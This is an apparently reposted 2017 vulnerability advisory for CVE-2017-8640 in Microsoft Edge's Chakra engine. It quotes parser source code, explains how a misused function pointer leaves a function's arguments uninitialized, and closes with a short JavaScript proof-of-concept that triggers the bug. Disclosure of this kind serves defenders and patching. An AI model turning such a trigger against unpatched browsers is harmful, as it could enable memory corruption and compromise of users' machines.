Microsoft Edge Chakra Uninitialized Arguments
Posted on 17 August 2017
Microsoft Edge: Chakra: Uninitialized arguments CVE-2017-8640 Here's a snippet of "ParseVariableDeclaration" which is used for parsing declarations. template<bool buildAST> ParseNodePtr Parser::ParseVariableDeclaration( tokens declarationType, charcount_t ichMin, BOOL fAllowIn/* = TRUE*/, BOOL* pfForInOk/* = nullptr*/, BOOL singleDefOnly/* = FALSE*/, BOOL allowInit/* = TRUE*/, BOOL isTopVarParse/* = TRUE*/, BOOL isFor/* = FALSE*/, BOOL* nativeForOk /*= nullptr*/) { ... if (pid == wellKnownPropertyPids.arguments && m_currentNodeFunc) { // This var declaration may change the way an 'arguments' identifier in the function is resolved if (declarationType == tkVAR) { m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_varDeclaration; } else { if (GetCurrentBlockInfo()->pnodeBlock->sxBlock.blockType == Function) { // Only override arguments if we are at the function block level. m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenByDecl; } } } ... } "m_currentNodeFunc" is only replaced when "buildAST" is true. So I think it's not supposed to use "m_currentNodeFunc" when "buildAST" is false. But the above code is using it regardless of "buildAST". So it may change a wrong function's "grfpn" flag. What I noticed is the "PNodeFlags::fpnArguments_overriddenByDecl" flag which makes the function's arguments uninitialized. PoC: function f() { ({a = () => { let arguments; }} = 1); arguments.x; } f(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt